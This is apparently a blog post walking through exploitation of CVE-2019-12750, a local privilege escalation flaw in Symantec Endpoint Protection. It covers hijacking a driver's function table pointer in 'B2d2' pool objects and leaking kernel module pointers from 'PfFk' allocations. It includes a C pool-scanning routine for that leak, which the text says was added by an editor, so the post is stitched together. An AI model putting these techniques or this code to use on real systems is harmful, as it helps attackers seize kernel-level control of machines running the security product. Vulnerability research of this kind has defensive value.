

In this post we will walk you through a more sophisticated method of exploiting CVE-2019-12750. This is a local privilege escalation vulnerability that affects Symantec Endpoint Protection. The method of exploitation described in this post works, at the time of writing, on all versions of Windows.

[Figure: Symantec Endpoint Protection v14.x B2d2 Object Created]

[Figure: Function Table Pointer is added in B2d2 Object]

[Figure: File Path Length, Maximum Length, and pointer to string buffer are added in B2d2 Object]

In other words, if our process creates a file and closes the handle to it, we have a 'B2d2' object associated with that file for as long as the process is running. When the process terminates, the driver uses the function table pointer stored in the object to call the appropriate cleanup functions.

Armed with this information, we are now able to proceed with the next stage.

We know enough to hijack the execution flow, so we can create a simple proof of concept by manually modifying the function table pointer in our 'B2d2' object. We replaced it with a dummy pointer (0xF8F8F8F8F8F8F8F8) and killed the process to confirm that we control the execution flow when this object is freed.

At this point we need to mention a couple of things. We can leak a pointer to the kernel module via 'PfFk' allocations.

These allocations do not always contain this specific pointer; sometimes they hold an arbitrary kernel-mode address instead. They are the same size as the bug-related pool chunk (0x30 bytes), so we quite frequently find them sharing the same memory page as our chunk.

And so here's our leaked kernel module pointer.
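The 'PfFk' leak described above needs a small amount of post-processing, because not every 'PfFk' chunk holds the module pointer. The C below is an added example written for this edit, not code from the original post or from the author: it walks a page of 0x30-byte pool chunks, keeps only the chunks tagged 'PfFk', collects every body value that is a canonical x64 kernel-mode address, and picks the value that repeats across the most chunks. The assumptions are mine: that 0x30 is the chunk size including the 0x10-byte x64 POOL_HEADER, that the pool tag sits at offset 4 of that header, that the module pointer is the candidate which repeats while the "arbitrary" addresses vary, and that the page contents are already in a user-mode buffer (how they get there is outside this example). The sample page is constructed inline with placeholder addresses and is not a real dump.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_SIZE   0x1000
#define CHUNK_SIZE  0x30                 /* assumed: 'PfFk'/bug chunk size, header included */
#define HDR_SIZE    0x10                 /* x64 POOL_HEADER */
#define KERNEL_MIN  0xFFFF800000000000ULL /* lowest canonical kernel-mode address on x64 */

#define TAG(a, b, c, d) ((uint32_t)(a) | ((uint32_t)(b) << 8) | \
                         ((uint32_t)(c) << 16) | ((uint32_t)(d) << 24))

/* A value is treated as a kernel pointer if it lies in the upper canonical half. */
bool is_kernel_ptr(uint64_t v) { return v >= KERNEL_MIN && v != ~0ULL; }

/* Pool tag at offset 4 of the x64 POOL_HEADER (assumed layout). */
static uint32_t chunk_tag(const uint8_t *chunk)
{
    uint32_t t;
    memcpy(&t, chunk + 4, sizeof t);
    return t;
}

/* Scan a page of 0x30-byte chunks. Every 8-byte body slot of a 'PfFk' chunk that
 * looks like a kernel pointer is a candidate; the candidate seen in the most
 * chunks is returned as the module pointer (heuristic, my assumption). Returns 0
 * when no candidate was found. *pffk_count receives the number of 'PfFk' chunks. */
uint64_t find_module_pointer(const uint8_t *page, size_t len, size_t *pffk_count)
{
    uint64_t cand[PAGE_SIZE / 8];
    unsigned hits[PAGE_SIZE / 8];
    size_t n = 0, seen = 0;

    for (size_t off = 0; off + CHUNK_SIZE <= len; off += CHUNK_SIZE) {
        const uint8_t *c = page + off;
        if (chunk_tag(c) != TAG('P', 'f', 'F', 'k'))
            continue;
        seen++;
        for (size_t i = HDR_SIZE; i + 8 <= CHUNK_SIZE; i += 8) {
            uint64_t v;
            memcpy(&v, c + i, sizeof v);
            if (!is_kernel_ptr(v))
                continue;
            size_t k;
            for (k = 0; k < n && cand[k] != v; k++)
                ;
            if (k == n) { cand[n] = v; hits[n] = 0; n++; }
            hits[k]++;
        }
    }
    if (pffk_count)
        *pffk_count = seen;
    size_t best = 0;
    for (size_t k = 1; k < n; k++)
        if (hits[k] > hits[best])
            best = k;
    return n ? cand[best] : 0;
}

/* Constructed sample chunk: header with the given tag, two qwords in the body. */
static void put_chunk(uint8_t *page, size_t idx, uint32_t tag, uint64_t q0, uint64_t q1)
{
    uint8_t *c = page + idx * CHUNK_SIZE;
    memset(c, 0, CHUNK_SIZE);
    c[2] = CHUNK_SIZE / 0x10;            /* BlockSize in 16-byte units, cosmetic only */
    memcpy(c + 4, &tag, sizeof tag);
    memcpy(c + HDR_SIZE, &q0, sizeof q0);
    memcpy(c + HDR_SIZE + 8, &q1, sizeof q1);
}

/* Constructed page (not a real dump): our 'B2d2' chunk, several 'PfFk' chunks,
 * a free chunk. 0xFFFFF80512340000 is a placeholder, not a real module base. */
size_t build_sample_page(uint8_t *page)
{
    const uint64_t module_ptr = 0xFFFFF80512340000ULL;
    memset(page, 0, PAGE_SIZE);
    put_chunk(page, 0, TAG('B', '2', 'd', '2'), 0xFFFFF80512345000ULL, 0);
    put_chunk(page, 1, TAG('P', 'f', 'F', 'k'), module_ptr, 0x1234);
    put_chunk(page, 2, TAG('P', 'f', 'F', 'k'), 0xFFFFA08011223340ULL, 0); /* arbitrary kernel address */
    put_chunk(page, 3, TAG('F', 'r', 'e', 'e'), 0, 0);
    put_chunk(page, 4, TAG('P', 'f', 'F', 'k'), module_ptr, 0xFFFFA08099887760ULL);
    put_chunk(page, 5, TAG('P', 'f', 'F', 'k'), 0x00007FF6DEAD0000ULL, 0); /* user-mode value, ignored */
    return 6 * CHUNK_SIZE;
}

int main(void)
{
    uint8_t page[PAGE_SIZE];
    size_t len = build_sample_page(page), n = 0;
    uint64_t p = find_module_pointer(page, len, &n);
    printf("%zu 'PfFk' chunks, module pointer candidate: 0x%016llx\n", n, (unsigned long long)p);
    return p ? 0 : 1;
}
```

On a real page the chunk stride and tag offset should be checked against what `!pool` shows for the target build before trusting the scan, and a candidate that only appears once should be treated as one of the arbitrary addresses rather than the module pointer.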
